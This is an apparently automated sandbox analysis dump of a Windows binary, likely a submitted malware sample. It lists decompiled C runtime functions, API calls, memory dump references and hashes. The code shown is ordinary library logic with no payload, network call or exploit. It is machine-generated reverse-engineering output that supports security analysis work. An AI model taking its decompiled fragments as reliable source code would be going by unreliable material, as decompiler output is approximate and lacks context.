Opcode Fuzzy Hash: 4c9f1391c27781ae0e8a1fdc3f2a701da6ce61fa81748751bd6d1aad50f98a9c
Instruction Fuzzy Hash: 1731A071A102059BDF44EF94C984BAEB775BF44304F1A806AEA017F381D7B0ED55CB94

Function 002D39AB, Relevance: 7.5, APIs: 5, Instructions: 35

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002D1061,?), ref: 002D39B3
GetVersion.KERNEL32 ref: 002D39C2
GetCurrentProcessId.KERNEL32 ref: 002D39D9
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 002D39F6
GetLastError.KERNEL32 ref: 002D3A15

Memory Dump Source

Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: Process$CreateCurrentErrorEventLastOpenVersion
String ID:
API String ID: 2270775618-0
Opcode ID: 3110d759c24c1e354c9ac6c8a56019d113d78968d025c03d13d87349711af43f
Instruction ID: d70886962790085759442398c4f68ff4742fd1e3883705a2046b2f3d73eda4fd
Opcode Fuzzy Hash: 3110d759c24c1e354c9ac6c8a56019d113d78968d025c03d13d87349711af43f
Instruction Fuzzy Hash: DDF06271FA2301DAD721CF24FD2DB193B64A704782F21851BE996DA2F0D7B04E508B17

Function 00410E52, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 217

C-Code - Quality: 49%

			E00410E52(CHAR* __edx, CHAR** _a4, CHAR* _a8) {
				CHAR* _v8;
				signed int _v12;
				CHAR* _v16;
				signed int _v20;
				CHAR* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				CHAR** _t42;
				CHAR* _t43;
				CHAR* _t44;
				CHAR* _t45;
				void* _t54;
				char* _t60;
				char* _t71;
				intOrPtr* _t81;
				intOrPtr _t87;
				void* _t97;
				CHAR* _t100;
				CHAR* _t103;
				CHAR* _t105;
				void* _t106;

				_t96 = __edx;
				_t42 = _a4;
				_t110 = _t42;
				_v20 = 0;
				if(_t42 != 0) {
					_t103 =  *_t42;
					__eflags = _t103;
					_v8 = _t103;
					if(__eflags == 0) {
						L11:
						_t43 = E0040D198(__eflags);
						 *_t43 = 0x16;
						L12:
						_t44 = _t43 | 0xffffffff;
						__eflags = _t44;
						L13:
						return _t44;
					}
					_t45 = E004138D6(_t103, 0x3d);
					__eflags = _t45;
					_v16 = _t45;
					if(__eflags == 0) {
						goto L11;
					}
					__eflags = _t103 - _t45;
					if(__eflags == 0) {
						goto L11;
					}
					__eflags = _t45[1];
					_t43 =  *0x43609c; // 0x1d31728
					__eflags = _t43 -  *0x4360a0; // 0x0
					_v12 = 0 | __eflags == 0x00000000;
					if(__eflags == 0) {
						_t43 = E00410DF5(__edx, _t43);
						 *0x43609c = _t43;
					}
					__eflags = _t43;
					if(_t43 != 0) {
						L20:
						_t105 =  *0x43609c; // 0x1d31728
						__eflags = _t105;
						_v24 = _t105;
						if(_t105 == 0) {
							goto L12;
						}
						_t100 = E00410DA8(_v16 - _v8, _v8);
						__eflags = _t100;
						if(_t100 < 0) {
							L30:
							__eflags = _v12;
							if(__eflags != 0) {
								_push(_v8);
								E00410D1A(0, _t100, _t105, __eflags);
								 *_a4 = 0;
								goto L49;
							}
							__eflags = _t100;
							if(_t100 < 0) {
								_t100 =  ~_t100;
							}
							_t25 =  &(_t100[2]); // 0x2
							_t43 = _t25;
							__eflags = _t43 - _t100;
							if(_t43 < _t100) {
								goto L12;
							} else {
								__eflags = _t43 - 0x3fffffff;
								if(_t43 >= 0x3fffffff) {
									goto L12;
								}
								_t43 = E0041116C( *0x43609c, 4, _t43);
								_t106 = _t106 + 0xc;
								__eflags = _t43;
								if(_t43 == 0) {
									goto L12;
								}
								_t96 = _v8;
								_t81 = _t43 + _t100 * 4;
								 *_t81 = _v8;
								 *((intOrPtr*)(_t81 + 4)) = 0;
								 *_a4 = 0;
								L37:
								 *0x43609c = _t43;
								L38:
								__eflags = _a8;
								if(_a8 != 0) {
									_t105 = _v8;
									_t100 = E004110D9(E0040CCD0(_t105) + 2, 1);
									__eflags = _t100;
									if(_t100 != 0) {
										_t54 = E0040CCD0(_t105);
										_t87 = _t105;
										_push(_t54 + 2);
										_push(_t100);
										__eflags = E0040D0F8(_t96);
										if(__eflags != 0) {
											_push(0);
											_push(0);
											_push(0);
											_push(0);
											_push(0);
											E0040CA26(0, _t87, _t96, _t100, __eflags);
										}
										_t60 = _t100 - _t105 + _v16;
										 *_t60 = 0;
										asm("sbb ecx, ecx");
										__eflags = SetEnvironmentVariableA(_t100,  !( ~_v12) & _t60 + 0x00000001);
										if(__eflags == 0) {
											_t35 =  &_v20;
											 *_t35 = _v20 | 0xffffffff;
											__eflags =  *_t35;
											 *((intOrPtr*)(E0040D198(__eflags))) = 0x2a;
										}
										_push(_t100);
										E00410D1A(0, _t100, _t105, __eflags);
									}
								}
								__eflags = _v12;
								if(__eflags != 0) {
									_push(_v8);
									E00410D1A(0, _t100, _t105, __eflags);
								}
								_t44 = _v20;
								goto L13;
							}
						}
						__eflags =  *_t105;
						if(__eflags == 0) {
							goto L30;
						}
						_t105 = _t105 + _t100 * 4;
						_push( *_t105);
						E00410D1A(0, _t100, _t105, __eflags);
						__eflags = _v12;
						if(_v12 != 0) {
							while(1) {
								__eflags =  *_t105;
								if( *_t105 == 0) {
									break;
								}
								 *_t105 = _t105[4];
								_t100 =  &(_t100[1]);
								__eflags = _t100;
								_t105 = _v24 + _t100 * 4;
							}
							__eflags = _t100 - 0x3fffffff;
							if(_t100 >= 0x3fffffff) {
								goto L38;
							}
							_t43 = E0041116C( *0x43609c, _t100, 4);
							_t106 = _t106 + 0xc;
							__eflags = _t43;
							if(_t43 == 0) {
								goto L38;
							}
							goto L37;
						}
						 *_t105 = _v8;
						 *_a4 = 0;
						goto L38;
					} else {
						__eflags = _a8;
						if(_a8 == 0) {
							L15:
							__eflags = _v12;
							if(_v12 != 0) {
								L49:
								_t44 = 0;
								goto L13;
							}
							_t43 = E00411099(4);
							__eflags = _t43;
							 *0x43609c = _t43;
							if(_t43 == 0) {
								goto L12;
							}
							 *_t43 = 0;
							__eflags =  *0x4360a4; // 0x0
							if(__eflags != 0) {
								goto L20;
							}
							_t43 = E00411099(4);
							__eflags = _t43;
							 *0x4360a4 = _t43;
							if(_t43 == 0) {
								goto L12;
							}
							 *_t43 = 0;
							goto L20;
						}
						__eflags =  *0x4360a4; // 0x0
						if(__eflags == 0) {
							goto L15;
						}
						_t43 = E0040CD5B(_t96);
						__eflags = _t43;
						if(__eflags == 0) {
							goto L20;
						}
						goto L11;
					}
				}
				_t71 = E0040D198(_t110);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				 *_t71 = 0x16;
				return E0040CB22(0, __edx, _t97) | 0xffffffff;
			}

0x00410e52
0x00410e58
0x00410e5e
0x00410e61
0x00410e64
0x00410e84
0x00410e86
0x00410e88
0x00410e8b
0x00410ee0
0x00410ee0
0x00410ee5
0x00410eeb
0x00410eeb
0x00410eeb
0x00410eee
0x00000000
0x00410eee
0x00410e90
0x00410e95
0x00410e99
0x00410e9c
0x00000000
0x00000000
0x00410e9e
0x00410ea0
0x00000000
0x00000000
0x00410ea4
0x00410ea7
0x00410eaf
0x00410eb5
0x00410eb8
0x00410ebc
0x00410ec1
0x00410ec1
0x00410ec6
0x00410ec8
0x00410f2a
0x00410f2a
0x00410f30
0x00410f32
0x00410f35
0x00000000
0x00000000
0x00410f45
0x00410f47
0x00410f4a
0x00410f9e
0x00410f9e
0x00410fa1
0x00411084
0x00411087
0x00411090
0x00000000
0x00411090
0x00410fa7
0x00410fa9
0x00410fab
0x00410fab
0x00410fad
0x00410fad
0x00410fb0
0x00410fb2
0x00000000
0x00410fb8
0x00410fb8
0x00410fbd
0x00000000
0x00000000
0x00410fcc
0x00410fd1
0x00410fd4
0x00410fd6
0x00000000
0x00000000
0x00410fdc
0x00410fdf
0x00410fe2
0x00410fe4
0x00410fea
0x00410fec
0x00410fec
0x00410ff1
0x00410ff1
0x00410ff4
0x00410ff6
0x0041100a
0x0041100c
0x00411010
0x00411014
0x0041101a
0x0041101c
0x0041101d
0x00411026
0x00411028
0x0041102a
0x0041102b
0x0041102c
0x0041102d
0x0041102e
0x0041102f
0x00411034
0x0041103e
0x00411041
0x00411046
0x00411054
0x00411056
0x00411058
0x00411058
0x00411058
0x00411061
0x00411061
0x00411067
0x00411068
0x0041106d
0x00411010
0x0041106e
0x00411071
0x00411073
0x00411076
0x0041107b
0x0041107c
0x00000000
0x0041107c
0x00410fb2
0x00410f4c
0x00410f4e
0x00000000
0x00000000
0x00410f50
0x00410f53
0x00410f55
0x00410f5a
0x00410f5e
0x00410f7b
0x00410f7b
0x00410f7d
0x00000000
0x00000000
0x00410f72
0x00410f77
0x00410f77
0x00410f78
0x00410f78
0x00410f7f
0x00410f85
0x00000000
0x00000000
0x00410f90
0x00410f95
0x00410f98
0x00410f9a
0x00000000
0x00000000
0x00000000
0x00410f9c
0x00410f63
0x00410f68
0x00000000
0x00410eca
0x00410eca
0x00410ecd
0x00410ef3
0x00410ef3
0x00410ef6
0x00411092
0x00411092
0x00000000
0x00411092
0x00410efe
0x00410f03
0x00410f06
0x00410f0b
0x00000000
0x00000000
0x00410f0d
0x00410f0f
0x00410f15
0x00000000
0x00000000
0x00410f19
0x00410f1e
0x00410f21
0x00410f26
0x00000000
0x00000000
0x00410f28
0x00000000
0x00410f28
0x00410ecf
0x00410ed5
0x00000000
0x00000000
0x00410ed7
0x00410edc
0x00410ede
0x00000000
0x00000000
0x00000000
0x00410ede
0x00410ec8
0x00410e66
0x00410e6b
0x00410e6c
0x00410e6d
0x00410e6e
0x00410e6f
0x00410e70
0x00000000

APIs

Part of subcall function 0040CD5B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00007FFF,01D31728,?,00000007,00000007,?,0040C52B,00007FFF), ref: 0040CD83
Part of subcall function 0040CD5B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,J-@HrA,00000000,00000000,?,00000007,00000007,?,0040C52B,00007FFF,?,00000000), ref: 0040CDA9

Part of subcall function 00411099: Sleep.KERNEL32(00000000,00000001,00000001,0040D3C9,00000018,00418C78,0000000C,0040D458,00000001,?,?,0040D22C,00000004,00418C58,0000000C,004110EC), ref: 004110B6

_strlen.LIBCMT ref: 00410FFC

Part of subcall function 004110D9: Sleep.KERNEL32(00000000,0040FA78,00000001,00000214), ref: 004110FE

_strlen.LIBCMT ref: 00411014
SetEnvironmentVariableA.KERNEL32(00000000,00402D4A,?,?,?,?,00000000,75F2170D,?,00418BD0,00000010,00402D4A,00417248), ref: 0041104E

Part of subcall function 0040CA26: IsDebuggerPresent.KERNEL32(?,?,0040EEF7), ref: 0040CAD0
Part of subcall function 0040CA26: SetUnhandledExceptionFilter.KERNEL32 ref: 0040CADA
Part of subcall function 0040CA26: UnhandledExceptionFilter.KERNEL32(?), ref: 0040CAE4
Part of subcall function 0040CA26: GetCurrentProcess.KERNEL32(C000000D,?,?,0040EEF7), ref: 0040CAFF
Part of subcall function 0040CA26: TerminateProcess.KERNEL32(00000000,?,?,0040EEF7), ref: 0040CB06

Part of subcall function 0041116C: Sleep.KERNEL32(00000000,00000000,00000000,75F2170D,?,00418BD0,00000010,00402D4A,00417248), ref: 00411199

Part of subcall function 00410D1A: HeapFree.KERNEL32(00000000,00000001,00418D60), ref: 00410D82
Part of subcall function 00410D1A: GetLastError.KERNEL32(?,0040D22C,00000004,00418C58,0000000C,004110EC,00000000,00000000,00000000,00000000,00000000,0040FA78,00000001,00000214), ref: 00410D93

Strings

J-@HrA, xrefs: 00410E52

Memory Dump Source

Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: Sleep$ByteCharExceptionFilterMultiProcessUnhandledWide_strlen$CurrentDebuggerEnvironmentErrorFreeHeapLastPresentTerminateVariable
String ID: J-@HrA
API String ID: 1585012247-3743386923
Opcode ID: 41ee8227dce6281a19a73b75075688b85e0f97ba5bb2c9ce6b6d11813acd3e92
Instruction ID: 335b78c267723d3b526c91eb43645e15cd01a0fbd303deb746c6d6396b4c9f8e
Opcode Fuzzy Hash: 41ee8227dce6281a19a73b75075688b85e0f97ba5bb2c9ce6b6d11813acd3e92
Instruction Fuzzy Hash: 9461A671A00206EFCF24DF65D8825EE7BB1EB05318B25453FE605E7290DBB999C1CB19

Function 0040CE14, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12
libraryloader

C-Code - Quality: 100%

			E0040CE14(intOrPtr _a4) {
				struct HINSTANCE__* _t2;

				_t2 = GetModuleHandleA("mscoree.dll");
				if(_t2 != 0) {
					_t2 = GetProcAddress(_t2, "CorExitProcess");
					if(_t2 != 0) {
						return _t2->i(_a4);
					}
				}
				return _t2;
			}

0x0040ce19
0x0040ce21
0x0040ce29
0x0040ce31
0x00000000
0x0040ce37
0x0040ce31
0x0040ce39

APIs

GetModuleHandleA.KERNEL32(mscoree.dll,0040CE43,00000214,0040C743,000000FF,0000001E,00000001,00000000,00000000,?,004110A6,0040FA78,00000001,00000001,0040D3C9,00000018), ref: 0040CE19
GetProcAddress.KERNEL32(00000000,CorExitProcess,?,004110A6,0040FA78,00000001,00000001,0040D3C9,00000018,00418C78,0000000C,0040D458,00000001,?,?,0040D22C), ref: 0040CE29

Strings

CorExitProcess, xrefs: 0040CE23
mscoree.dll, xrefs: 0040CE14

Memory Dump Source

Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 1646373207-1276376045
Opcode ID: 8d160feb217aa1bd7d4dae39f124b2cbf41a6624c82ac813e61e7aac4fd57f39
Instruction ID: fcabfaf94eeba7cb859a5f7a285e885b6fa2fcfb323eecb89a6d1dbf4cb90af6
Opcode Fuzzy Hash: 8d160feb217aa1bd7d4dae39f124b2cbf41a6624c82ac813e61e7aac4fd57f39
Instruction Fuzzy Hash: 0FC012B4348302AACA001F718C0DB9B3AB8AE48B8171080B67008E11A1CBB8C90095E8

Function 00412F38, Relevance: 6.2, APIs: 4, Instructions: 165

APIs

GetStringTypeW.KERNEL32(00000001,00418118,00000001,?,00000100,?,?,?,?,?,0041311E,?,?,?,?,?), ref: 00412F65
GetLastError.KERNEL32(?,0041311E,?,?,?,?,?,?,?), ref: 00412F77
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00413054

Part of subcall function 004134B0: GetLocaleInfoA.KERNEL32(?,00001004,?,00000006,?,?,?,?,?,?,?), ref: 004134D2

GetStringTypeA.KERNEL32(?,?,?,0041311E,?,00000100,?,?,?,?,?,0041311E,?,?,?,?), ref: 004130C9

Part of subcall function 0040FE9A: IsDebuggerPresent.KERNEL32 ref: 00412B08
Part of subcall function 0040FE9A: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00412B1D
Part of subcall function 0040FE9A: UnhandledExceptionFilter.KERNEL32(004181C4), ref: 00412B28
Part of subcall function 0040FE9A: GetCurrentProcess.KERNEL32(C0000409), ref: 00412B44
Part of subcall function 0040FE9A: TerminateProcess.KERNEL32(00000000), ref: 00412B4B

Part of subcall function 00410D1A: HeapFree.KERNEL32(00000000,?), ref: 00410D82
Part of subcall function 00410D1A: GetLastError.KERNEL32(?,?,0040EFA6), ref: 00410D93

Part of subcall function 004134F7: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,?,?,00000000,00000000), ref: 00413621

Memory Dump Source

Source File: 00000001.00000002.3011514816.000000000040E000.00000020.sdmp, Offset: 0040E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_40e000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: StringType$ErrorExceptionFilterLastProcessUnhandled$ByteCharCurrentDebuggerFreeHeapInfoLocaleMultiPresentTerminateWide
String ID:
API String ID: 2921542721-0
Opcode ID: 87293724a1808aebd5272e2655a6100abe24618218fab50748e6694a1345a00c
Instruction ID: d46c18d8d68949bb4ae9f948932a194cea07ec9ef34beebbf33d215d183c743c
Opcode Fuzzy Hash: 87293724a1808aebd5272e2655a6100abe24618218fab50748e6694a1345a00c
Instruction Fuzzy Hash: 70517C7150010AAFCF209F64DC819EF7FE9EB08355B20443AF905D6250D779DEE19BA8

Function 00410380, Relevance: 6.1, APIs: 4, Instructions: 116

C-Code - Quality: 93%

			E00410380(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t47;
				signed int _t52;
				signed int _t61;
				signed int _t62;
				signed int _t63;
				long _t64;
				LONG* _t67;
				intOrPtr _t69;
				LONG* _t73;
				intOrPtr _t89;
				void* _t92;
				void* _t96;
				intOrPtr _t97;
				void* _t98;
				void* _t101;

				_t101 = __eflags;
				_t87 = __edx;
				_push(0x14);
				_push(0x418d20);
				E0040D48C(__ebx, __edi, __esi);
				 *(_t98 - 0x20) =  *(_t98 - 0x20) | 0xffffffff;
				_t89 = E0040FAC6(__ebx, __edx, _t101);
				 *((intOrPtr*)(_t98 - 0x24)) = _t89;
				E004100B7(__ebx, __edx, _t89, __esi, _t101);
				_t47 = E0041015B( *((intOrPtr*)(_t98 + 8)));
				 *((intOrPtr*)(_t98 + 8)) = _t47;
				if(_t47 ==  *((intOrPtr*)( *(_t89 + 0x68) + 4))) {
					_t41 = _t98 - 0x20;
					 *_t41 =  *(_t98 - 0x20) & 0x00000000;
					__eflags =  *_t41;
					L26:
					return E0040D4D1( *(_t98 - 0x20));
				}
				_t73 = E00411099(0x220);
				_t103 = _t73;
				if(_t73 == 0) {
					goto L26;
				}
				_t96 =  *(_t89 + 0x68);
				memcpy(_t73, _t96, 0x88 << 2);
				_t92 = _t96 + 0x110;
				 *_t73 =  *_t73 & 0x00000000;
				_t52 = E004101D5(0, _t87, _t103,  *((intOrPtr*)(_t98 + 8)), _t73);
				 *(_t98 - 0x20) = _t52;
				if(_t52 != 0) {
					__eflags = _t52 - 0xffffffff;
					if(_t52 == 0xffffffff) {
						__eflags = _t73 - 0x42c4a8;
						if(__eflags != 0) {
							_push(_t73);
							E00410D1A(_t73, _t92, _t96, __eflags);
						}
						 *((intOrPtr*)(E0040D198(__eflags))) = 0x16;
					}
				} else {
					_t97 =  *((intOrPtr*)(_t98 - 0x24));
					_t13 = _t97 + 0x68; // 0x784
					if(InterlockedDecrement( *_t13) == 0) {
						_t14 = _t97 + 0x68; // 0x784
						_t69 =  *_t14;
						_t106 = _t69 - 0x42c4a8;
						if(_t69 != 0x42c4a8) {
							_push(_t69);
							E00410D1A(_t73, _t92, _t97, _t106);
						}
					}
					 *(_t97 + 0x68) = _t73;
					_t93 = InterlockedIncrement;
					InterlockedIncrement(_t73);
					if(( *(_t97 + 0x70) & 0x00000002) == 0 && ( *0x42c9cc & 0x00000001) == 0) {
						E0040D43F(_t73, InterlockedIncrement, 0xd);
						 *(_t98 - 4) =  *(_t98 - 4) & 0x00000000;
						 *0x436664 = _t73[1];
						 *0x436668 = _t73[2];
						 *0x43666c = _t73[3];
						_t61 = 0;
						while(1) {
							 *(_t98 - 0x1c) = _t61;
							if(_t61 >= 5) {
								break;
							}
							 *((short*)(0x436658 + _t61 * 2)) =  *((intOrPtr*)(_t73 + 0x10 + _t61 * 2));
							_t61 = _t61 + 1;
						}
						_t62 = 0;
						__eflags = 0;
						while(1) {
							 *(_t98 - 0x1c) = _t62;
							__eflags = _t62 - 0x101;
							if(_t62 >= 0x101) {
								break;
							}
							 *((char*)(_t62 + 0x42c6c8)) =  *((intOrPtr*)( &(_t73[7]) + _t62));
							_t62 = _t62 + 1;
						}
						_t63 = 0;
						__eflags = 0;
						while(1) {
							 *(_t98 - 0x1c) = _t63;
							__eflags = _t63 - 0x100;
							if(_t63 >= 0x100) {
								break;
							}
							 *((char*)(_t63 + 0x42c7d0)) =  *((intOrPtr*)( &(_t73[0x47]) + _t63));
							_t63 = _t63 + 1;
						}
						_t64 = InterlockedDecrement( *0x42c8d0);
						__eflags = _t64;
						if(_t64 == 0) {
							_t67 =  *0x42c8d0; // 0x1d314b0
							__eflags = _t67 - 0x42c4a8;
							if(__eflags != 0) {
								_push(_t67);
								E00410D1A(_t73, _t93, _t97, __eflags);
							}
						}
						 *0x42c8d0 = _t73;
						InterlockedIncrement(_t73);
						 *(_t98 - 4) = 0xfffffffe;
						E004104E1();
					}
				}
			}

0x00410380
0x00410380
0x00410380
0x00410382
0x00410387
0x0041038c
0x00410395
0x00410397
0x0041039a
0x004103a5
0x004103aa
0x004103b0
0x0041050d
0x0041050d
0x0041050d
0x00410511
0x00410519
0x00410519
0x004103c1
0x004103c3
0x004103c5
0x00000000
0x00000000
0x004103d0
0x004103d5
0x004103d5
0x004103d7
0x004103de
0x004103e5
0x004103ea
0x004104ec
0x004104ef
0x004104f1
0x004104f7
0x004104f9
0x004104fa
0x004104ff
0x00410505
0x00410505
0x004103f0
0x004103f0
0x004103f3
0x004103fe
0x00410400
0x00410400
0x00410403
0x00410408
0x0041040a
0x0041040b
0x00410410
0x00410408
0x00410411
0x00410415
0x0041041b
0x00410421
0x00410436
0x0041043c
0x00410443
0x0041044b
0x00410453
0x00410458
0x0041045a
0x0041045a
0x00410460
0x00000000
0x00000000
0x00410467
0x0041046f
0x0041046f
0x00410472
0x00410472
0x00410474
0x00410474
0x00410477
0x0041047c
0x00000000
0x00000000
0x00410482
0x00410488
0x00410488
0x0041048b
0x0041048b
0x0041048d
0x0041048d
0x00410490
0x00410495
0x00000000
0x00000000
0x0041049e
0x004104a4
0x004104a4
0x004104ad
0x004104b3
0x004104b5
0x004104b7
0x004104bc
0x004104c1
0x004104c3
0x004104c4
0x004104c9
0x004104c1
0x004104ca
0x004104d1
0x004104d3
0x004104da
0x004104da
0x00410421

APIs

Part of subcall function 004100B7: InterlockedDecrement.KERNEL32(?), ref: 00410110
Part of subcall function 004100B7: InterlockedIncrement.KERNEL32(01D314B0), ref: 0041013B

Part of subcall function 0041015B: GetOEMCP.KERNEL32(00000000,?,0040F3F2), ref: 00410182
Part of subcall function 0041015B: GetACP.KERNEL32(00000000,?,0040F3F2), ref: 004101A5

Part of subcall function 00411099: Sleep.KERNEL32(00000000,00000001,00000001,0040D3C9,00000018,00418C78,0000000C,0040D458,00000001,?,?,0040D22C,00000004,00418C58,0000000C,004110EC), ref: 004110B6

Part of subcall function 004101D5: GetCPInfo.KERNEL32(00000000,0041052A,00000000,?,00000000,00418D20), ref: 0041022B

InterlockedDecrement.KERNEL32(00000784), ref: 004103F6
InterlockedIncrement.KERNEL32(00000000), ref: 0041041B

Part of subcall function 0040D43F: EnterCriticalSection.KERNEL32(?,?,?,0040D22C,00000004,00418C58,0000000C,004110EC,00000000,00000000,00000000,00000000,00000000,0040FA78,00000001,00000214), ref: 0040D467

InterlockedDecrement.KERNEL32 ref: 004104AD
InterlockedIncrement.KERNEL32(00000000), ref: 004104D1

Part of subcall function 00410D1A: HeapFree.KERNEL32(00000000,00000001,00418D60), ref: 00410D82
Part of subcall function 00410D1A: GetLastError.KERNEL32(?,0040D22C,00000004,00418C58,0000000C,004110EC,00000000,00000000,00000000,00000000,00000000,0040FA78,00000001,00000214), ref: 00410D93

Memory Dump Source

Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: Interlocked$DecrementIncrement$CriticalEnterErrorFreeHeapInfoLastSectionSleep
String ID:
API String ID: 2389022545-0
Opcode ID: f6a90a7c0af97f40d7f07acc023a57620c87fa2eb5766b16b51f16715c1810fa
Instruction ID: 6b68cbd896846394304d0449b409a003626e702cc587c9906820f4b381173e56
Opcode Fuzzy Hash: f6a90a7c0af97f40d7f07acc023a57620c87fa2eb5766b16b51f16715c1810fa
Instruction Fuzzy Hash: 474192719003099BDB10EF75D8C569E3BE0AF08328F14856BE945DB2A1DBBCD8C18B6C

Function 002D503C, Relevance: 6.1, APIs: 4, Instructions: 76sleepstring

APIs

Sleep.KERNEL32(000000C8), ref: 002D506A
lstrlenW.KERNEL32(?), ref: 002D50A0

Part of subcall function 002D1000: RtlAllocateHeap.NTDLL(00000000,?,002D4CB5), ref: 002D100C

memcpy.NTDLL(00000000,?,?,?), ref: 002D50C1
SysFreeString.OLEAUT32(?), ref: 002D50D5

Memory Dump Source

Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: AllocateFreeHeapSleepStringlstrlenmemcpy
String ID:
API String ID: 651314941-0
Opcode ID: ca268cc89325912e4dd919bd1dafe87b111ff1d57872e836667d0f7960ce1956
Instruction ID: 49a46fdc2037016d7b1d5f2d6374c5132107c8d57e3b37a60e0264fe8c6cb9bc
Opcode Fuzzy Hash: ca268cc89325912e4dd919bd1dafe87b111ff1d57872e836667d0f7960ce1956
Instruction Fuzzy Hash: 8E213175901619EFCB10DFA8D984D9EBBB8FF49311B20416AE905D7310E7719E54CF90

Function 0040E568, Relevance: 6.1, APIs: 4, Instructions: 53memory

APIs

RtlReAllocateHeap.NTDLL(00000000,00436BE4,?,00000000), ref: 0040E58F
RtlAllocateHeap.NTDLL(00000008,000041C4), ref: 0040E5C5
VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,00000000,0040EAC2), ref: 0040E5DF
HeapFree.KERNEL32(00000000,?), ref: 0040E5F6

Memory Dump Source

Source File: 00000001.00000002.3011514816.000000000040E000.00000020.sdmp, Offset: 0040E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_40e000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: Heap$Allocate$AllocFreeVirtual
String ID:
API String ID: 94566200-0
Opcode ID: e68206b2571ad2f33e4c0a726f1a4164fb77a1f21caaad09450859c6edacd99a
Instruction ID: a73b86c3c3e85fffb530331acd84b0771d661e4ca93faab2e0671b4a69d89a33
Opcode Fuzzy Hash: e68206b2571ad2f33e4c0a726f1a4164fb77a1f21caaad09450859c6edacd99a
Instruction Fuzzy Hash: C6119171548712BBC7218F65FD45956BBB5F7943207129D3AF2A2EB1F0D370A8108F68

Function 0040FA43, Relevance: 6.0, APIs: 4, Instructions: 47thread

APIs

GetLastError.KERNEL32(?,?,0040EFA6), ref: 0040FA45

Part of subcall function 0040F928: TlsGetValue.KERNEL32(0040FA52,?,?,0040EFA6), ref: 0040F92E
Part of subcall function 0040F928: TlsSetValue.KERNEL32(00000000,?,0040EFA6), ref: 0040F94B

TlsGetValue.KERNEL32(?,?,0040EFA6), ref: 0040FA5E
SetLastError.KERNEL32(00000000,?,?,0040EFA6), ref: 0040FABB

Part of subcall function 004110D9: Sleep.KERNEL32(00000000), ref: 004110FE

Part of subcall function 0040F8BC: GetModuleHandleA.KERNEL32(0041804C,?,0040F943,?,?,0040EFA6), ref: 0040F8F5
Part of subcall function 0040F8BC: GetProcAddress.KERNEL32(00000000,0041805C,?,0040F943,?,?,0040EFA6), ref: 0040F905
Part of subcall function 0040F8BC: RtlDecodePointer.NTDLL(?,?,0040F943,?,?,0040EFA6), ref: 0040F913

GetCurrentThreadId.KERNEL32(?,?,0040EFA6), ref: 0040FAA3

Part of subcall function 00410D1A: HeapFree.KERNEL32(00000000,?), ref: 00410D82
Part of subcall function 00410D1A: GetLastError.KERNEL32(?,?,0040EFA6), ref: 00410D93

Part of subcall function 0040F98F: GetModuleHandleA.KERNEL32(0041804C,?,?,0040EFA6), ref: 0040F9A0
Part of subcall function 0040F98F: InterlockedIncrement.KERNEL32(0042C4A8), ref: 0040F9FB

Memory Dump Source

Source File: 00000001.00000002.3011514816.000000000040E000.00000020.sdmp, Offset: 0040E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_40e000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: ErrorLastValue$HandleModule$AddressCurrentDecodeFreeHeapIncrementInterlockedPointerProcSleepThread
String ID:
API String ID: 361139372-0
Opcode ID: d2ef33143c1287e03155dba053b2720c21a804814e0b140adeb12520a9994683
